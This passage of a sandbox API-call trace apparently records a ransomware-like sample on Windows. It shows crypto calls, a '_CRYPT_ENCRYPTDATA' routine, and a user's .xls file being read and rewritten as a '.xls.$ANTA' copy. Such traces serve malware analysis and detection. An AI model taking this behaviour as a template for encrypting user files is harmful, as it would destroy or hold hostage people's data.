phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac600) returned 1 [0080.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0080.216] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.216] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0080.217] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0080.217] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\vmdyvxc3ol-gmt2m.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0080.217] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.217] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0080.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0080.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.218] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.218] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0080.218] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0080.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0080.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0080.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0080.228] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb")) returned 0x10 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0080.229] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\vmdyvxc3ol-gmt2m.xls.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0080.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0080.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.229] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0080.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0080.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0080.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0080.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0080.230] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0080.230] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0080.230] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0080.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0080.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0080.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0080.233] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0080.233] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x10000, lpOverlapped=0x0) returned 1 [0080.235] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x6373, lpOverlapped=0x0) returned 1 [0080.236] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0080.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0080.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16373) returned 0x499a008 [0080.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16373) returned 0x49b0388 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0080.239] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16373) returned 0x499a008 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0080.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.239] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0080.240] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0080.240] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28c0 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16373) returned 0x499a008 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2860 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0080.240] RtlAllocateHeap 